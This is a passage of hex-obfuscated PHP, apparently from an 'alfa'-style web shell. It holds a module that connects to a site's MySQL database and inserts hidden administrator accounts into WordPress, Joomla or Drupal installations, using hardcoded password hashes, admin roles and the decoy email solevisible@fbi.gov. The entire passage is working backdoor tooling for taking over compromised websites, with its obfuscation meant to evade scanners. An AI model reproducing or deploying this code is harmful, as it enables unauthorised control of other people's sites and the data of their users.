array("\x77\x70", 2), "\x4a\x6f\x6f\155\154\x61" => array("\152\x6f\x6f\x6d\154\x61", 3), "\166\x42\165\154\x6c\145\x74\151\x6e" => array("\x76\142", 5), "\160\150\160\x42\x42" => array("\160\150\x70\142\142", 6), "\x57\110\x4d\x43\123" => array("\167\x68\x6d\143\163", 7), "\115\x79\x42\102" => array("\x6d\x79\x62\x62", 8), "\120\x68\160\x20\x4e\165\x6b\145" => array("\x6e\x75\x6b\x65", 9), "\104\162\x75\x70\141\154" => array("\x64\162\x75\x70\141\x6c", 10), "\123\x4d\x46" => array("\163\x6d\146", 11)); goto cHS3m; pA4Oh: echo "\74\144\151\x76\40\143\154\141\163\163\x3d\x68\x65\x61\144\x65\162\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\74\x62\x72\x3e\74\144\151\x76\40\143\154\x61\163\x73\75\x22\x74\170\x74\146\157\x6e\x74\137\150\145\x61\x64\x65\162\42\x3e\174\x20\x41\144\144\40\x4e\x65\x77\x20\x41\144\x6d\x69\156\40\174\74\x2f\x64\x69\x76\76\15\12\74\x63\x65\x6e\164\x65\x72\x3e\x3c\150\63\x3e"; goto Bx2Ok; wDmLQ: alfahead(); goto pA4Oh; J_X5I: if ($_POST["\141\x6c\x66\141\x32"] && $_POST["\141\154\146\141\x32"] == "\152\157\x6f\x6d\154\x61") { goto Y_sZ4; Y_sZ4: echo __pre() . "\74\143\145\x6e\164\145\x72\x3e\x3c\x63\145\x6e\x74\x65\x72\x3e\74\x64\x69\x76\40\x63\154\x61\163\x73\75\x22\164\x78\164\x66\157\x6e\x74\137\x68\145\x61\144\145\162\42\76\x7c\x20\x4a\157\157\x6d\x6c\141\x20\x7c\x3c\x2f\144\x69\x76\x3e\74\160\76\x3c\x70\x3e" . getConfigHtml("\152\x6f\x6f\x6d\154\x61") . "\74\57\x70\x3e\74\146\x6f\x72\155\x20\x6f\156\123\x75\142\155\151\164\75\42\x67\x28\x27\x70\167\x63\150\x61\156\x67\x65\x72\x27\x2c\x6e\x75\x6c\154\x2c\x27\x3e\x3e\x27\x2c\x27\x6a\x6f\157\x6d\x6c\x61\47\54\x74\x68\x69\x73\x2e\154\157\x63\x61\x6c\150\157\163\x74\x2e\166\141\154\165\145\x2c\x74\150\151\x73\x2e\144\141\164\141\x62\141\x73\x65\56\166\141\154\x75\145\x2c\x74\150\151\x73\x2e\x75\x73\x65\x72\x6e\x61\x6d\x65\56\x76\141\154\x75\145\54\164\x68\151\x73\56\x70\141\163\x73\167\157\x72\x64\x2e\x76\141\x6c\x75\x65\x2c\x6e\x75\x6c\x6c\54\164\x68\x69\x73\56\x61\x64\x6d\151\156\x2e\x76\141\x6c\x75\145\x2c\164\x68\151\163\x2e\x65\155\141\151\x6c\56\166\141\154\x75\145\x2c\x74\x68\151\x73\56\x70\x72\145\146\151\170\x2e\166\x61\x6c\165\x65\51\73\162\145\x74\x75\162\156\40\146\x61\154\x73\145\x3b\42\40\x6d\145\164\x68\x6f\x64\x3d\42\120\117\x53\124\x22\x3e"; goto M3m1h; mA2QW: echo "\74\x70\x3e\74\x69\x6e\x70\165\164\40\x76\141\x6c\x75\145\x3d\42\x20\42\40\156\x61\155\145\x3d\x22\163\x65\156\144\42\x20\x74\x79\x70\x65\75\42\x73\x75\142\155\x69\x74\x22\x3e\74\57\160\x3e\74\x2f\146\157\162\155\x3e\x3c\57\143\145\x6e\x74\145\x72\76"; goto z38Nu; tQ9tF: create_table($table); goto mA2QW; M3m1h: $table = array("\x74\144\61" => array("\143\157\154\x6f\x72" => "\x46\106\x46\106\106\x46", "\164\x64\116\x61\155\x65" => "\x4d\x79\163\x71\154\40\110\157\x73\x74", "\151\x64" => "\144\142\x5f\x68\157\x73\x74", "\x69\x6e\x70\x75\x74\116\x61\x6d\145" => "\154\x6f\143\141\x6c\x68\157\x73\164", "\x69\x6e\160\x75\164\x56\141\x6c\x75\x65" => "\x6c\157\143\141\x6c\x68\x6f\163\x74", "\151\x6e\x70\x75\164\123\x69\x7a\145" => "\x35\x30"), "\164\x64\62" => array("\x63\x6f\154\x6f\162" => "\x46\106\106\106\x46\106", "\x74\144\116\141\155\145" => "\104\x62\40\116\141\x6d\x65", "\151\x64" => "\x64\x62\x5f\156\x61\x6d\145", "\x69\156\160\x75\164\x4e\x61\155\x65" => "\x64\x61\x74\x61\x62\x61\163\x65", "\151\156\160\x75\164\126\x61\154\x75\x65" => '', "\151\x6e\160\x75\x74\123\x69\x7a\x65" => "\x35\x30"), "\164\144\63" => array("\143\x6f\x6c\x6f\x72" => "\106\106\106\x46\x46\106", "\x74\144\116\x61\x6d\x65" => "\x44\x62\x20\125\163\x65\162", "\151\144" => "\144\x62\137\165\x73\145\x72", "\x69\156\160\165\x74\x4e\x61\155\145" => "\x75\163\145\162\156\141\155\x65", "\x69\156\160\x75\164\x56\x61\x6c\x75\145" => '', "\151\156\x70\x75\164\123\x69\x7a\x65" => "\x35\x30"), "\x74\144\x34" => array("\x63\157\154\157\x72" => "\106\x46\106\106\x46\x46", "\x74\x64\x4e\x61\155\145" => "\104\142\x20\x50\x61\x73\163", "\151\144" => "\x64\142\x5f\x70\167", "\x69\156\x70\165\x74\116\141\155\x65" => "\x70\141\163\163\x77\x6f\162\x64", "\151\156\x70\x75\164\x56\141\154\x75\x65" => '', "\x69\156\160\165\x74\x53\x69\172\145" => "\x35\60"), "\164\x64\x35" => array("\143\157\154\x6f\x72" => "\106\x46\106\x46\106\x46", "\x74\144\x4e\141\x6d\x65" => "\124\x61\x62\x6c\x65\40\120\x72\145\x66\x69\170", "\151\144" => "\144\x62\137\160\162\x65\146\151\x78", "\x69\x6e\x70\x75\x74\x4e\141\155\145" => "\160\x72\x65\146\151\x78", "\x69\x6e\160\x75\x74\x56\x61\x6c\x75\x65" => "\152\x6f\163\137", "\151\x6e\160\165\164\x53\x69\172\x65" => "\x35\x30"), "\x74\x64\66" => array("\x63\x6f\x6c\x6f\162" => "\x46\106\60\60\x30\60", "\x74\144\x4e\141\x6d\145" => "\101\x64\x6d\x69\156\x20\x55\x73\x65\x72", "\x69\156\x70\x75\164\x4e\141\155\x65" => "\141\x64\x6d\151\156", "\x69\x6e\x70\165\x74\126\141\x6c\165\x65" => "\x61\x64\x6d\151\156", "\151\156\160\x75\x74\123\151\x7a\145" => "\65\x30"), "\x74\144\x37" => array("\x63\157\x6c\x6f\162" => "\x46\x46\60\x30\x30\60", "\164\x64\x4e\x61\155\145" => "\101\144\x6d\151\156\x20\x50\141\x73\x73", "\x69\156\x70\x75\x74\x4e\x61\x6d\x65" => "\x74\x6f\x66\x74\157\x66", "\x69\x6e\x70\165\x74\126\x61\x6c\165\145" => "\x73\x6f\154\x65\x76\x69\163\151\142\x6c\x65", "\x69\x6e\160\165\164\x53\x69\x7a\x65" => "\x35\x30", "\144\x69\x73\141\x62\154\145\144" => true), "\x74\x64\x38" => array("\x63\157\154\x6f\162" => "\x46\x46\60\x30\x30\x30", "\x74\x64\116\141\155\x65" => "\x41\x64\x6d\x69\x6e\40\x45\x6d\x61\x69\x6c", "\151\x6e\x70\165\164\x4e\141\x6d\x65" => "\x65\x6d\141\151\x6c", "\x69\x6e\x70\x75\x74\x56\141\154\165\x65" => "\163\157\x6c\145\166\151\163\x69\x62\154\x65\x40\x66\x62\x69\56\147\157\x76", "\151\156\160\165\164\123\151\x7a\145" => "\65\x30")); goto tQ9tF; z38Nu: if ($_POST["\141\x6c\146\141\61"] && $_POST["\x61\x6c\x66\141\61"] == "\x3e\76") { goto B4woe; ZOX8H: $solevisible = @mysqli_query($conn, "\163\145\154\145\143\x74\40\151\x64\40\146\x72\x6f\x6d\40" . $prefix . "\165\x73\145\162\x73\40\x77\x68\145\x72\x65\40\x75\x73\145\x72\156\141\x6d\145\x3d\x27" . $admin . "\x27") or die(mysqli_error($conn)); goto Li15o; MDGY1: $solevisible = @mysqli_query($conn, "\151\x6e\x73\145\x72\x74\40\x69\156\x74\x6f\40" . $prefix . "\x75\x73\x65\162\x73\x20\50\x69\144\54\156\141\x6d\x65\54\x75\x73\145\x72\x6e\x61\x6d\x65\54\145\155\141\151\x6c\x2c\x70\x61\163\163\167\x6f\162\144\51\40\166\141\x6c\165\145\163\50\x6e\165\154\x6c\54\47\123\165\x70\x65\162\40\x55\163\x65\x72\x27\x2c\x27" . $admin . "\x27\54\x27" . $SQL . "\47\54\47\x64\64\x61\65\x39\x30\143\x61\141\143\143\60\142\x65\65\65\145\x66\x32\x38\66\145\64\60\141\x39\64\65\145\x61\64\x35\47\51") or die(mysqli_error($conn)); goto ZOX8H; zoeyI: $admin = $_POST["\x61\x6c\x66\x61\70"]; goto qu2zc; KTxzr: if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["\x69\144"]; } goto yXR1t; yXR1t: $solevisible = @mysqli_query($conn, "\111\116\x53\x45\122\x54\x20\x49\116\x54\117\x20" . $prefix . "\x75\163\145\x72\137\x75\x73\145\162\x67\x72\157\165\160\x5f\x6d\x61\160\x20\50\x75\x73\x65\x72\137\151\144\x2c\147\162\157\x75\x70\x5f\x69\144\x29\40\126\101\x4c\125\x45\x53\40\50\x27" . $res . "\x27\x2c\40\47\x38\47\x29") or die(mysqli_error($conn)); goto er4yz; QKxh1: $database = $_POST["\141\x6c\x66\x61\x34"]; goto zRhNh; qu2zc: $SQL = $_POST["\x61\x6c\x66\141\x39"]; goto Z1F5t; Z1F5t: $prefix = $_POST["\x61\x6c\146\x61\61\60"]; goto zjv2s; EqwPa: $password = $_POST["\x61\154\x66\141\66"]; goto zoeyI; Li15o: $sole = @mysqli_num_rows($solevisible); goto KTxzr; zRhNh: $username = $_POST["\x61\154\x66\x61\x35"]; goto EqwPa; B4woe: $localhost = $_POST["\141\x6c\146\141\x33"]; goto QKxh1; er4yz: if ($solevisible) { __alert("\123\165\x63\143\x65\x73\163\56\x2e\x2e\40" . $admin . "\40\151\163\40\143\162\x65\x61\164\x65\x64\x2e\x2e\x2e"); } goto C3zWi; zjv2s: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto MDGY1; C3zWi: } goto Dz0Du; Dz0Du: } goto ox10V; CG8KE: if (isset($_POST["\141\154\146\141\x31"]) && $_POST["\x61\x6c\146\141\x31"] == "\x77\160") { goto SOhpK; AZt5m: if ($_POST["\x61\154\x66\x61\62"] && $_POST["\x61\x6c\x66\x61\x32"] == "\76\x3e") { goto tnHLz; ZzJzx: $username = $_POST["\x61\x6c\146\x61\65"]; goto U7byK; RqI5F: $solevisible = @mysqli_query($conn, "\x69\x6e\x73\x65\162\x74\x20\x69\x6e\164\x6f\x20" . $prefix . "\x75\x73\x65\x72\163\x20\50\111\104\54\x75\163\x65\162\x5f\154\157\147\151\x6e\x2c\x75\x73\x65\162\137\160\141\163\x73\54\x75\x73\x65\x72\x5f\x65\x6d\x61\151\x6c\51\x20\x76\141\x6c\x75\145\163\50\x6e\165\x6c\154\x2c\x27{$admin}\47\54\47\144\x34\x61\x35\71\60\143\141\141\143\143\60\x62\145\65\x35\x65\146\x32\x38\66\145\64\x30\x61\x39\x34\x35\145\x61\x34\x35\47\54\47{$SQL}\x27\51") or die(mysqli_error($conn)); goto X0y7l; DxH0a: if ($solevisible) { __alert("\x53\x75\x63\x63\x65\x73\163\x2e\x2e\x2e\x20" . $admin . "\40\x69\x73\40\143\x72\145\x61\x74\145\144\56\56\x2e"); } goto HNJsq; VmIVx: $solevisible = @mysqli_query($conn, "\151\156\163\x65\x72\164\x20\151\x6e\x74\x6f\40" . $prefix . "\165\163\145\162\155\x65\x74\x61\x20\50\x75\x6d\x65\x74\141\137\151\144\x2c\x75\163\145\x72\137\x69\144\54\x6d\x65\x74\x61\x5f\153\145\171\x2c\x6d\x65\164\x61\137\166\x61\154\x75\145\x29\40\x76\x61\154\165\x65\x73\50\x6e\x75\154\x6c\54\47" . $res . "\x27\x2c\x27\x66\151\162\163\x74\137\156\141\x6d\x65\x27\54\x27\163\157\x6c\x65\166\x69\163\151\x62\x6c\x65\x27\x29\x2c\50\156\165\154\x6c\54\x27" . $res . "\x27\x2c\47\154\141\x73\x74\137\156\x61\x6d\x65\x27\x2c\x27\163\157\154\145\166\151\163\151\x62\154\x65\x27\x29\x2c\x28\156\x75\x6c\154\54\x27" . $res . "\47\x2c\x27\x6e\x69\143\153\156\x61\155\x65\47\54\47\x73\157\154\x65\x76\151\x73\151\x62\x6c\145\x27\x29\54\x28\156\x75\x6c\154\x2c\x27" . $res . "\x27\x2c\47\144\x65\x73\143\162\x69\x70\164\151\157\156\47\54\47\x73\x6f\x6c\145\x76\151\163\151\142\x6c\145\x27\51\x2c\x28\156\165\x6c\154\x2c\47" . $res . "\x27\x2c\47\162\151\x63\x68\x5f\x65\144\x69\164\151\x6e\x67\x27\x2c\47\164\x72\165\x65\x27\51\x2c\x28\x6e\165\154\x6c\x2c\x27" . $res . "\47\54\x27\x63\157\155\x6d\145\x6e\x74\137\x73\150\x6f\162\x74\x63\165\x74\163\47\x2c\x27\x66\x61\x6c\163\x65\47\51\x2c\x28\156\165\154\x6c\54\x27" . $res . "\x27\x2c\x27\141\x64\x6d\151\x6e\137\143\x6f\154\x6f\x72\x27\54\47\146\162\145\163\x68\47\51\x2c\50\x6e\165\154\154\54\47" . $res . "\47\54\47\x75\163\145\x5f\x73\x73\154\47\54\x27\x30\x27\x29\x2c\x28\156\x75\154\x6c\x2c\x27" . $res . "\x27\x2c\47\163\150\x6f\x77\137\x61\x64\x6d\x69\156\x5f\142\x61\162\137\x66\x72\157\x6e\x74\x27\54\x27\164\162\165\145\x27\51\x2c\x28\156\x75\x6c\154\54\x27" . $res . "\x27\54\x27" . $prefix . "\143\141\x70\141\142\x69\x6c\x69\164\x69\x65\163\47\x2c\47\x61\x3a\61\x3a\x7b\x73\72\x31\x33\x3a\42\x61\x64\x6d\x69\x6e\151\x73\164\162\141\x74\157\x72\x22\x3b\x62\72\x31\x3b\x7d\47\51\x2c\x28\156\x75\x6c\x6c\54\x27" . $res . "\47\x2c\47" . $prefix . "\x75\163\x65\x72\137\x6c\145\x76\x65\x6c\x27\54\47\61\60\47\x29\54\x28\156\x75\154\154\x2c\47" . $res . "\47\54\47\x73\x68\x6f\x77\137\x77\145\x6c\143\x6f\155\x65\137\x70\x61\156\x65\154\x27\54\x27\61\x27\x29\x2c\x28\x6e\x75\154\154\x2c\47" . $res . "\47\54\47" . $prefix . "\144\141\163\x68\142\x6f\x61\162\x64\x5f\x71\165\151\x63\153\137\160\x72\145\163\x73\x5f\x6c\141\163\164\137\x70\157\x73\x74\137\151\x64\x27\x2c\47\63\47\51") or die(mysqli_error($conn)); goto DxH0a; X0y7l: $solevisible = @mysqli_query($conn, "\163\145\154\x65\143\x74\40\111\x44\x20\x66\x72\157\x6d\40" . $prefix . "\165\163\145\162\163\40\x77\x68\145\x72\x65\40\165\x73\145\x72\x5f\154\x6f\x67\x69\156\x3d\x27" . $admin . "\47") or die(mysqli_error($conn)); goto UdMgz; agKmL: $SQL = $_POST["\141\x6c\x66\x61\71"]; goto js1l1; IC0UP: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto RqI5F; U7byK: $password = $_POST["\x61\154\x66\141\x36"]; goto PSnf_; gu1dx: $database = $_POST["\x61\154\146\141\64"]; goto ZzJzx; xVDLc: if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["\x49\104"]; } goto VmIVx; UdMgz: $sole = @mysqli_num_rows($solevisible); goto xVDLc; PSnf_: $admin = $_POST["\x61\154\x66\141\70"]; goto agKmL; js1l1: $prefix = $_POST["\x61\154\146\x61\x31\60"]; goto IC0UP; tnHLz: $localhost = $_POST["\141\x6c\146\141\63"]; goto gu1dx; HNJsq: } goto g2FFN; oXAsB: create_table($table); goto UseI5; UseI5: echo "\74\x70\x3e\74\151\156\160\165\164\x20\x76\141\x6c\165\145\75\x22\x20\x22\x20\156\x61\155\145\x3d\x22\x73\x65\156\x64\42\40\x74\171\x70\x65\x3d\x22\163\165\142\x6d\151\x74\42\x3e\x3c\57\160\76\x3c\x2f\x66\157\162\155\x3e"; goto AZt5m; Mo8Y8: $table = array("\164\x64\61" => array("\x63\157\x6c\157\x72" => "\x46\106\106\x46\x46\x46", "\x74\144\x4e\141\x6d\x65" => "\115\171\163\161\x6c\x20\x48\x6f\163\x74", "\151\x64" => "\144\142\137\150\157\163\x74", "\x69\156\x70\x75\x74\116\141\x6d\145" => "\x6c\x6f\143\141\x6c\150\157\163\164", "\151\156\160\165\x74\126\141\154\x75\145" => "\x6c\157\x63\x61\154\150\x6f\x73\164", "\x69\x6e\160\x75\x74\123\x69\172\x65" => "\x35\60"), "\x74\x64\62" => array("\x63\x6f\154\157\x72" => "\106\x46\x46\106\x46\x46", "\x74\x64\x4e\141\155\x65" => "\x44\x62\40\116\141\x6d\145", "\x69\x64" => "\x64\142\137\156\141\155\x65", "\x69\x6e\x70\x75\164\x4e\x61\x6d\x65" => "\144\141\164\141\142\x61\163\x65", "\x69\x6e\x70\x75\x74\x56\x61\154\x75\x65" => '', "\x69\156\x70\x75\164\x53\x69\x7a\x65" => "\x35\x30"), "\x74\144\x33" => array("\x63\157\154\157\162" => "\x46\x46\106\106\x46\106", "\x74\x64\116\141\x6d\145" => "\x44\142\40\125\x73\145\x72", "\x69\x64" => "\144\x62\137\165\163\145\162", "\151\156\160\165\164\x4e\141\155\x65" => "\x75\x73\145\x72\x6e\x61\155\145", "\151\x6e\160\165\164\x56\x61\x6c\165\145" => '', "\151\x6e\160\x75\x74\x53\x69\172\145" => "\x35\x30"), "\164\x64\x34" => array("\x63\157\154\157\x72" => "\x46\x46\106\x46\106\106", "\164\x64\116\141\x6d\145" => "\x44\x62\x20\x50\141\x73\x73", "\151\x64" => "\x64\142\137\160\167", "\151\156\160\x75\x74\116\141\x6d\145" => "\160\141\x73\163\167\x6f\x72\144", "\151\156\160\x75\x74\126\x61\154\165\145" => '', "\x69\156\x70\165\x74\123\151\x7a\145" => "\x35\x30"), "\x74\144\x35" => array("\x63\157\154\x6f\162" => "\106\x46\106\x46\106\106", "\164\x64\x4e\x61\155\x65" => "\x54\x61\142\x6c\x65\40\120\x72\x65\146\151\170", "\x69\144" => "\x64\x62\x5f\x70\x72\145\x66\151\170", "\151\x6e\160\x75\x74\x4e\x61\155\x65" => "\x70\162\x65\x66\151\170", "\x69\x6e\160\x75\x74\x56\141\x6c\x75\145" => "\167\160\x5f", "\x69\x6e\160\x75\x74\123\x69\172\145" => "\65\x30"), "\x74\144\66" => array("\x63\157\x6c\x6f\162" => "\106\x46\60\x30\x30\x30", "\x74\144\x4e\x61\x6d\x65" => "\101\x64\x6d\151\156\x20\x55\x73\145\162", "\x69\x6e\160\x75\x74\116\141\x6d\x65" => "\141\x64\155\151\156", "\x69\156\x70\x75\164\x56\141\x6c\x75\145" => "\141\144\155\x69\156", "\x69\x6e\x70\165\164\x53\x69\x7a\x65" => "\65\60"), "\164\x64\x37" => array("\x63\157\154\x6f\162" => "\x46\106\60\60\x30\60", "\164\x64\x4e\x61\x6d\x65" => "\x41\144\155\x69\x6e\x20\120\141\x73\163", "\x69\156\x70\x75\x74\x4e\141\x6d\145" => "\153\150", "\x69\x6e\160\165\164\x56\141\154\x75\145" => "\x73\x6f\154\145\x76\151\163\x69\142\x6c\145", "\x69\156\x70\x75\164\x53\151\172\x65" => "\x35\60", "\x64\151\x73\141\x62\154\145\144" => true), "\164\144\70" => array("\143\x6f\154\157\162" => "\x46\106\x30\60\60\60", "\x74\x64\116\141\155\x65" => "\101\144\155\x69\x6e\40\105\x6d\x61\151\154", "\151\x6e\160\165\164\x4e\141\x6d\145" => "\145\x6d\x61\x69\x6c", "\x69\156\x70\x75\x74\126\x61\154\x75\x65" => "\x73\x6f\154\145\166\x69\163\151\142\x6c\x65\100\x66\142\x69\x2e\147\x6f\x76", "\151\x6e\x70\x75\x74\123\x69\x7a\x65" => "\x35\x30")); goto oXAsB; SOhpK: echo __pre() . "\x3c\x63\x65\x6e\164\x65\162\76\x3c\x63\x65\x6e\164\x65\x72\76\x3c\144\x69\x76\x20\143\154\x61\163\163\75\42\164\x78\164\146\157\156\x74\x5f\x68\145\141\144\145\162\42\76\x7c\40\x57\157\162\x64\120\x72\x65\x73\163\40\x7c\74\x2f\144\x69\x76\76\15\xa\x3c\160\76" . getConfigHtml("\167\x70") . "\74\x2f\x70\x3e\74\x66\x6f\162\x6d\x20\157\x6e\123\x75\x62\x6d\x69\164\x3d\42\147\x28\47\160\x77\143\150\141\x6e\x67\x65\162\47\54\156\165\154\x6c\54\x27\167\160\47\54\x27\76\x3e\47\54\164\150\151\163\x2e\154\157\x63\141\154\x68\157\163\x74\x2e\x76\141\154\x75\145\54\x74\150\151\163\56\144\141\164\141\x62\x61\163\145\x2e\166\141\x6c\x75\x65\54\x74\150\151\x73\56\165\163\145\162\x6e\x61\155\145\56\166\x61\x6c\165\x65\54\164\x68\151\x73\56\x70\x61\163\163\x77\x6f\162\x64\56\x76\x61\154\165\145\x2c\156\165\154\154\x2c\164\x68\x69\163\56\141\x64\155\151\156\x2e\166\141\x6c\x75\145\x2c\x74\150\x69\163\x2e\145\x6d\x61\151\154\56\166\141\154\165\145\x2c\x74\150\151\x73\x2e\x70\x72\x65\146\151\x78\x2e\x76\x61\x6c\x75\x65\51\x3b\x72\145\x74\x75\162\156\x20\x66\x61\x6c\163\x65\73\42\x20\155\145\164\x68\x6f\144\75\x22\x50\x4f\123\124\42\x3e"; goto Mo8Y8; g2FFN: } goto J_X5I; YHDK_: if (isset($_POST["\141\154\x66\x61\71"]) && $_POST["\141\x6c\146\141\71"] == "\x64\x72\165\x70\141\154") { goto K9sv1; Cpzbm: if ($_POST["\141\154\146\141\61"] && $_POST["\x61\x6c\x66\141\x31"] == "\76\76") { goto eGuwt; n80Ak: $sole = mysqli_num_rows($solevisible); goto JVrDf; FFrE8: $getDescuid = @mysqli_query($conn, "\x73\145\x6c\x65\143\164\x20\x75\151\x64\x20\146\x72\157\155\40\x75\163\x65\162\x73\x20\x6f\162\x64\145\x72\40\142\171\40\165\x69\144\40\144\x65\x73\143\40\154\x69\155\151\164\40\x30\x2c\61"); goto GwfJx; is_hH: $admin = $_POST["\x61\154\x66\141\70"]; goto zmm18; oJs8E: $getdescuid = $getDescuid++; goto S1srJ; O2HFO: $username = $_POST["\x61\x6c\146\x61\x35"]; goto pxyFr; L9jF_: if ($solevisible) { __alert("\x53\x75\143\x63\145\163\x73\x2e\56\x2e\x20" . $admin . "\40\151\x73\x20\143\x72\x65\x61\x74\145\144\x2e\x2e\x2e"); } goto Kcea6; i7ZjN: $database = $_POST["\x61\x6c\x66\x61\x34"]; goto O2HFO; eGuwt: $localhost = $_POST["\141\x6c\146\141\x32"]; goto i7ZjN; zmm18: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto FFrE8; GwfJx: $getDescuid = @mysqli_fetch_assoc($getDescuid); goto idAfE; JVrDf: if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["\x75\x69\144"]; } goto hv9_f; idAfE: $getDescuid = $getDescuid["\x75\x69\x64"]; goto oJs8E; hv9_f: $solevisible = @mysqli_query($conn, "\111\116\123\x45\122\x54\40\x49\x4e\124\x4f\x20\165\163\x65\x72\163\137\162\x6f\154\x65\163\x20\x28\x75\x69\x64\x2c\x72\151\144\51\x20\x56\x41\x4c\x55\x45\123\x20\50\x27" . $res . "\47\54\x20\47\63\47\x29") or die(mysqli_error($conn)); goto L9jF_; S1srJ: $solevisible = @mysqli_query($conn, "\x69\156\x73\x65\162\164\40\x69\156\x74\157\40\x75\x73\x65\x72\163\x20\50\x75\x69\x64\x2c\x6e\141\155\145\54\x70\x61\163\x73\x2c\x6d\141\x69\154\54\163\x69\x67\156\x61\164\165\162\x65\137\x66\x6f\162\x6d\x61\x74\x2c\x73\164\x61\x74\x75\x73\x2c\164\151\155\145\x7a\x6f\x6e\145\x2c\x69\x6e\x69\164\x29\x20\166\x61\154\x75\145\163\x28\x27{$getDescuid}\x27\x2c\47{$admin}\47\54\x27\44\123\x24\104\x50\62\171\x39\101\x62\157\x6c\x43\x42\x4f\144\134\x2f\127\x79\x51\x63\160\x7a\165\x34\172\106\65\67\x71\105\x30\156\x6f\x79\x43\116\145\x58\x5a\x57\x76\x2e\63\x37\122\66\x36\x56\163\x46\x6a\x4f\151\x43\47\54\47\x73\157\154\145\166\151\163\x69\142\x6c\145\x40\x66\142\151\x2e\147\157\166\x27\x2c\47\146\151\154\x74\x65\162\x65\144\x5f\150\x74\x6d\154\47\x2c\x27\x31\47\x2c\47\x45\x75\162\x6f\x70\145\57\102\x65\162\154\x69\x6e\x27\54\47\163\x6f\154\x65\166\151\x73\151\x62\x6c\145\x40\x66\142\x69\56\147\157\x76\47\x29") or die(mysqli_error($conn)); goto R2De3; pxyFr: $password = $_POST["\141\154\146\x61\66"]; goto is_hH; R2De3: $solevisible = @mysqli_query($conn, "\163\145\154\145\x63\x74\x20\165\151\144\40\146\x72\x6f\155\x20\x75\163\145\x72\163\x20\167\150\x65\162\x65\x20\x6e\141\155\x65\75\47" . $admin . "\x27") or die(mysqli_error($conn)); goto n80Ak; Kcea6: } goto lJ_VG; PCdKd: echo "\x3c\x70\76\x3c\151\x6e\x70\x75\164\40\166\141\x6c\165\145\75\42\x20\42\x20\156\x61\x6d\x65\75\42\x73\x65\156\x64\42\x20\164\x79\160\145\75\42\163\x75\x62\155\151\x74\x22\76\x3c\57\160\76\74\x2f\x66\x6f\x72\x6d\x3e\74\x2f\143\145\x6e\164\145\x72\x3e"; goto Cpzbm; K9sv1: echo __pre() . "\74\143\x65\x6e\164\x65\162\x3e\x3c\144\x69\x76\x20\143\154\x61\x73\x73\x3d\x22\x74\x78\x74\146\x6f\x6e\164\137\150\145\x61\144\145\x72\42\76\174\40\x44\x72\x75\160\x61\x6c\40\x7c\74\57\x64\151\166\x3e\x3c\x70\x3e\x3c\x70\76" . getConfigHtml("\144\162\165\160\141\154") . "\74\57\x70\76\74\146\x6f\162\155\40\x6f\156\123\x75\x62\155\x69\164\75\42\x67\x28\x27\160\167\x63\x68\141\156\x67\x65\x72\47\x2c\156\165\x6c\x6c\54\x27\76\76\47\54\x74\150\151\163\x2e\x6c\157\x63\141\154\x68\x6f\163\164\x2e\x76\x61\x6c\x75\145\x2c\x6e\x75\x6c\x6c\54\164\150\151\x73\56\x64\x61\x74\141\142\141\163\x65\x2e\x76\x61\154\x75\x65\x2c\164\150\151\163\56\165\163\x65\x72\156\x61\155\x65\56\166\141\x6c\x75\x65\54\x74\x68\151\x73\x2e\x70\x61\x73\163\167\x6f\x72\144\x2e\166\141\x6c\x75\145\x2c\x6e\165\154\154\x2c\164\x68\151\163\56\141\144\x6d\151\156\x2e\166\141\154\165\x65\54\47\144\x72\165\160\x61\x6c\x27\x29\x3b\40\x72\145\164\165\x72\x6e\x20\x66\141\154\x73\145\73\x22\x20\155\x65\x74\150\157\x64\75\x22\x50\x4f\123\x54\42\76"; goto W30UA; W30UA: $table = array("\x74\144\x31" => array("\143\157\x6c\157\162" => "\106\x46\x46\106\x46\x46", "\x74\144\x4e\x61\155\145" => "\x4d\x79\x73\x71\x6c\40\x48\x6f\x73\x74", "\x69\144" => "\x64\x62\137\x68\x6f\x73\164", "\151\x6e\160\x75\164\x4e\x61\155\145" => "\154\157\143\x61\154\150\x6f\163\x74", "\x69\x6e\x70\x75\164\x56\141\x6c\165\x65" => "\x6c\157\143\141\154\x68\x6f\163\164", "\151\156\160\x75\x74\123\151\x7a\145" => "\65\x30"), "\164\144\x32" => array("\x63\157\154\x6f\162" => "\x46\x46\x46\106\106\x46", "\164\144\116\141\x6d\x65" => "\104\x62\x20\116\141\155\145", "\151\144" => "\144\x62\x5f\156\x61\x6d\145", "\151\x6e\160\165\x74\116\x61\155\145" => "\x64\141\x74\x61\142\x61\163\x65", "\x69\x6e\160\165\x74\126\141\x6c\x75\x65" => '', "\x69\x6e\160\x75\164\123\x69\172\145" => "\65\60"), "\164\x64\x33" => array("\x63\157\154\157\x72" => "\106\x46\x46\106\x46\x46", "\164\144\x4e\141\155\145" => "\104\x62\x20\x55\x73\x65\162", "\x69\144" => "\x64\x62\137\x75\x73\x65\x72", "\151\156\x70\165\164\x4e\141\155\145" => "\165\163\145\x72\156\141\155\145", "\x69\156\160\x75\164\126\141\x6c\165\x65" => '', "\151\x6e\160\x75\x74\x53\x69\172\x65" => "\65\60"), "\164\144\x34" => array("\143\157\x6c\x6f\x72" => "\x46\106\106\x46\x46\106", "\164\x64\116\141\x6d\x65" => "\x44\142\x20\x50\x61\x73\x73", "\x69\x64" => "\x64\x62\x5f\x70\x77", "\151\x6e\160\x75\164\x4e\x61\x6d\x65" => "\x70\141\163\x73\167\x6f\x72\144", "\151\156\160\165\x74\126\141\154\x75\x65" => '', "\x69\x6e\160\165\x74\x53\151\172\x65" => "\x35\x30"), "\x74\x64\x36" => array("\143\157\x6c\157\x72" => "\106\x46\60\60\x30\x30", "\164\x64\x4e\141\155\x65" => "\101\144\155\151\156\x20\x55\163\145\x72", "\x69\x6e\x70\x75\x74\x4e\x61\155\x65" => "\141\x64\155\x69\x6e", "\x69\156\x70\165\164\126\x61\154\x75\145" => "\141\144\x6d\151\156", "\151\x6e\x70\165\x74\x53\x69\172\145" => "\65\60"), "\164\x64\x37" => array("\143\x6f\154\x6f\x72" => "\x46\x46\60\x30\60\x30", "\x74\x64\x4e\x61\x6d\145" => "\101\144\x6d\151\156\40\x50\x61\x73\163", "\x69\x6e\160\x75\164\116\x61\155\145" => "\164\157\x66\164\x6f\x66", 